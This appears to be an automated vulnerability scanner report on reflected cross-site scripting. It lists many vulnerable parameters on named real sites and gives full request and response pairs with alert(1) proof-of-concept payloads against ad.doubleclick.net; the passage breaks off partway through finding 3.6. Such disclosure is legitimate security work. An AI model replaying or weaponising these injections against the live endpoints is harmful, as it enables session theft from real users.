http://r.turn.com/server/pixel.htm [fpid parameter]
http://r.turn.com/server/pixel.htm [sp parameter]
http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter]
http://um.simpli.fi/am_js.js [admeld_callback parameter]
http://um.simpli.fi/am_match [admeld_adprovider_id parameter]
http://um.simpli.fi/am_match [admeld_callback parameter]
http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter]
http://um.simpli.fi/am_redirect_js [admeld_callback parameter]
http://view.atdmt.com/CNT/iview/136138030/direct [REST URL parameter 4]
http://view.atdmt.com/CNT/iview/136138030/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136138030/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136138030/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136138030/direct [wi.708;hi.258/01?click parameter]
http://view.atdmt.com/CNT/iview/136138030/direct [wi.708;hi.258/01?click parameter]
http://view.atdmt.com/CNT/iview/136476399/direct [REST URL parameter 4]
http://view.atdmt.com/CNT/iview/136476399/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136476399/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136476399/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136476399/direct [wi.228;hi.123/01?click parameter]
http://view.atdmt.com/CNT/iview/136476399/direct [wi.228;hi.123/01?click parameter]
http://view.atdmt.com/CNT/iview/136476400/direct/01 [REST URL parameter 4]
http://view.atdmt.com/CNT/iview/136476400/direct/01 [click parameter]
http://view.atdmt.com/CNT/iview/136476400/direct/01 [click parameter]
http://view.atdmt.com/CNT/iview/136476400/direct/01 [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136476400/direct/01 [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136476400/direct/01 [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/COM/iview/305845687/direct [REST URL parameter 4]
http://view.atdmt.com/COM/iview/305845687/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/COM/iview/305845687/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/COM/iview/305845687/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/COM/iview/305845687/direct [pc.504470/01/2011.04.27.21.55.51?click parameter]
http://view.atdmt.com/COM/iview/305845687/direct [pc.504470/01/2011.04.27.21.55.51?click parameter]
http://wd.sharethis.com/api/getCount2.php [cb parameter]
http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter]
http://wd.sharethis.com/api/getCount2.php [url parameter]
http://widgets.digg.com/buttons/count [url parameter]
https://www.att.com/olam/a [REST URL parameter 2]
https://www.att.com/olam/js/cookie.js [REST URL parameter 2]
https://www.att.com/olam/js/cookie.js [REST URL parameter 3]
https://www.att.com/olam/js/flash.js [REST URL parameter 2]
https://www.att.com/olam/js/flash.js [REST URL parameter 3]
https://www.att.com/olam/js/posUtil.js [REST URL parameter 2]
https://www.att.com/olam/js/posUtil.js [REST URL parameter 3]
https://www.att.com/olam/js/registration.js [REST URL parameter 2]
https://www.att.com/olam/js/registration.js [REST URL parameter 3]
https://www.att.com/olam/js/sniffer.js [REST URL parameter 2]
https://www.att.com/olam/js/sniffer.js [REST URL parameter 3]
https://www.att.com/olam/js/tool-tips.js [REST URL parameter 2]
https://www.att.com/olam/js/tool-tips.js [REST URL parameter 3]
https://www.att.com/olam/js/validate.js [REST URL parameter 2]
https://www.att.com/olam/js/validate.js [REST URL parameter 3]
https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 2]
https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 3]
https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 4]
https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 5]
https://www.att.com/olam/loginAction.olamexecute [REST URL parameter 2]
https://www.att.com/olam/registrationAction.olamexecute [REST URL parameter 2]
http://www.cbs.com/sitecommon/includes/cacheable/combine.php [files parameter]
http://www.cbs.com/sitecommon/includes/cacheable/combine.php [files parameter]
http://www.cbs.com/sitecommon/includes/cacheable/combine.php [name of an arbitrarily supplied request parameter]
http://www.cbssports.com/ads/local-page.html [REST URL parameter 2]
http://www.cbssports.com/data/community/author// [REST URL parameter 1]
http://www.cbssports.com/data/community/author// [REST URL parameter 2]
http://www.cbssports.com/data/community/author// [REST URL parameter 3]
http://www.cbssports.com/data/community/content-thread/566165/1/10/newest/tennis/get/p [REST URL parameter 1]
http://www.cbssports.com/data/community/content-thread/566165/1/10/newest/tennis/get/p [REST URL parameter 2]
http://www.cbssports.com/data/community/content-thread/566165/1/10/newest/tennis/get/p [REST URL parameter 3]
http://www.cbssports.com/tennis [REST URL parameter 1]
http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 1]
http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 2]
http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 3]
http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 4]
http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 4]
http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 4]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 1]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 2]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 3]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 4]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 4]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 4]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 5]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 6]
http://www.gamespot.com/crossdomain.xml [REST URL parameter 1]
http://www.gamespot.com/favicon.ico [REST URL parameter 1]
http://www.gamespot.com/games.html [REST URL parameter 1]
http://www.gamespot.com/pages/hub/modules/topslot_xml.php [REST URL parameter 1]
http://www.gamespot.com/pages/hub/modules/topslot_xml.php [REST URL parameter 2]
http://www.gamespot.com/pages/hub/modules/topslot_xml.php [REST URL parameter 3]
http://www.gamespot.com/pages/hub/modules/topslot_xml.php [REST URL parameter 4]
https://www.issa.org/Members/Log-In.php [issa_connect_url parameter]
https://www.issa.org/Members/Log-In.php [name of an arbitrarily supplied request parameter]
https://www.kryptronic.com/index.php [core--login--password parameter]
https://www.kryptronic.com/index.php [core--login--user parameter]
http://www.last.fm/ajax/getgloballisteners [REST URL parameter 2]
http://www.map-generator.net/ [address parameter]
http://www.map-generator.net/ [name parameter]
http://www.map-generator.net/extmap.php [address parameter]
http://www.map-generator.net/extmap.php [address parameter]
http://www.map-generator.net/extmap.php [name of an arbitrarily supplied request parameter]
http://www.map-generator.net/extmap.php [name parameter]
http://www.map-generator.net/map.php [address parameter]
http://www.map-generator.net/map.php [name parameter]
http://www.maxpreps.com/ScriptResource.axd [d parameter]
http://www.maxpreps.com/WebResource.axd [d parameter]
http://www.maxpreps.com/WebResource.axd [t parameter]
http://www.maxpreps.com/videoview.aspx [videoid parameter]
http://www.mysimon.com/ajax/login/submit/ [next parameter]
http://www.webutation.net/ [name of an arbitrarily supplied request parameter]
http://www.webutation.net/go/about [name of an arbitrarily supplied request parameter]
http://www.webutation.net/go/contact [name of an arbitrarily supplied request parameter]
http://www.webutation.net/go/review/facebook.de [name of an arbitrarily supplied request parameter]
http://www.webutation.net/go/review/webutation.net [name of an arbitrarily supplied request parameter]
http://www.webutation.net/go/review/xss.cx [name of an arbitrarily supplied request parameter]
http://www.widgetbox.com/CatalogFeed/Stats [REST URL parameter 2]
http://www35.glam.com/gad/glamadapt_psrv.act [;afid parameter]
http://yournorthland.com/aboutUs/careers.asp [area parameter]
http://yournorthland.com/aboutUs/careers.asp [atype parameter]
http://yournorthland.com/aboutUs/careers.asp [office parameter]
http://yournorthland.com/aboutUs/careers.asp [rtCtr parameter]
http://yournorthland.com/aboutUs/eeo.asp [area parameter]
http://yournorthland.com/aboutUs/eeo.asp [atype parameter]
http://yournorthland.com/aboutUs/eeo.asp [office parameter]
http://yournorthland.com/aboutUs/eeo.asp [rtCtr parameter]
http://yournorthland.com/aboutUs/whoWeAre.asp [area parameter]
http://yournorthland.com/aboutUs/whoWeAre.asp [atype parameter]
http://yournorthland.com/aboutUs/whoWeAre.asp [office parameter]
http://yournorthland.com/aboutUs/whoWeAre.asp [rtCtr parameter]
http://yournorthland.com/custHelp/paymentoptions.asp [area parameter]
http://yournorthland.com/custHelp/paymentoptions.asp [atype parameter]
http://yournorthland.com/custHelp/paymentoptions.asp [office parameter]
http://yournorthland.com/custHelp/paymentoptions.asp [rtCtr parameter]
http://yournorthland.com/custHelp/phoneHelp.asp [area parameter]
http://yournorthland.com/custHelp/phoneHelp.asp [atype parameter]
http://yournorthland.com/custHelp/phoneHelp.asp [office parameter]
http://yournorthland.com/custHelp/phoneHelp.asp [rtCtr parameter]
http://yournorthland.com/custhelp/default.asp [area parameter]
http://yournorthland.com/custhelp/default.asp [office parameter]
http://yournorthland.com/custhelp/default.asp [rtCtr parameter]
http://yournorthland.com/scripts/formmail.asp [Email parameter]
http://yournorthland.com/scripts/formmail.asp [_recipients parameter]
http://yournorthland.com/scripts/formmail.asp [_requiredFields parameter]
http://moneywatch.bnet.com/ [Referer HTTP header]
http://moneywatch.bnet.com/money-library/ [Referer HTTP header]
http://moneywatch.bnet.com/money-library/ [Referer HTTP header]
http://www.bnet.com/ [Referer HTTP header]
http://www.bnet.com/ [Referer HTTP header]
http://www.bnet.com/management [Referer HTTP header]
http://www.bnet.com/management [Referer HTTP header]
http://www.bnet.com/management [Referer HTTP header]
http://www.gamespot.com/ [Referer HTTP header]
http://www.gamespot.com/ [Referer HTTP header]
http://www.gamespot.com/games.html [Referer HTTP header]
https://www.issa.org/Members/Log-In.php [Referer HTTP header]
http://www.metacritic.com/ [Referer HTTP header]
http://www.metacritic.com/games/ [Referer HTTP header]
http://www.tv.com/shows/ [Referer HTTP header]
http://moneywatch.bnet.com/ [XCLGFbrowser cookie]
http://moneywatch.bnet.com/money-library/ [XCLGFbrowser cookie]
http://ocp.cbs.com/pacific/Response.jsp [_PACIFIC_COMMENTS cookie]
http://seg.sharethis.com/getSegment.php [__stid cookie]
http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_btf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_btf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_btf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_btf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cnetnews/728x90/cnetnews_atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cnetnews/728x90/cnetnews_atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/urbanbaby/300x250/urbanbaby_atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/urbanbaby/300x250/urbanbaby_atf [meld_sess cookie]
http://www.bnet.com/ [XCLGFbrowser cookie]
http://www.bnet.com/management [XCLGFbrowser cookie]
http://www.cbssports.com/ [sjxBeta cookie]
http://www.cbssports.com/ [sjxBeta cookie]
http://www.cbssports.com/tennis [sjxBeta cookie]
http://www.cbssports.com/tennis [sjxBeta cookie]
http://www.cbssports.com/tennis/players/playerpage/566165 [sjxBeta cookie]
http://www.cbssports.com/tennis/players/playerpage/566165 [sjxBeta cookie]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [sjxBeta cookie]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [sjxBeta cookie]
http://www.gamespot.com/games.html [XCLGFbrowser cookie]
http://www.ip2location.com/ib2/ [name of an arbitrarily supplied request parameter]
http://www.tv.com/shows/ [XCLGFbrowser cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6c9c"-alert(1)-"edfe4a4f26d was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59c6c9c"-alert(1)-"edfe4a4f26d&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
236574810%3B0-0%3B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59c6c9c"-alert(1)-"edfe4a4f26d&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=T
...[SNIP]...

3.2. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4c6f"-alert(1)-"ed7ce2bf638 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=f4c6f"-alert(1)-"ed7ce2bf638&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
0%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=f4c6f"-alert(1)-"ed7ce2bf638&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&eve
...[SNIP]...

3.3. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce68e"-alert(1)-"d288f6ef5a2 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=ce68e"-alert(1)-"d288f6ef5a2&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=ce68e"-alert(1)-"d288f6ef5a2&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_201
...[SNIP]...

3.4. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80897"-alert(1)-"d0bb0cf4d58 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=80897"-alert(1)-"d0bb0cf4d58&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
72%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=80897"-alert(1)-"d0bb0cf4d58&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Me
...[SNIP]...

3.5. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa51d"-alert(1)-"1d6c11e2fec was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=aa51d"-alert(1)-"1d6c11e2fec&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
77/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=aa51d"-alert(1)-"1d6c11e2fec&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http
...[SNIP]...

3.6. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9c36"-alert(1)-"b25cda93eb9 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

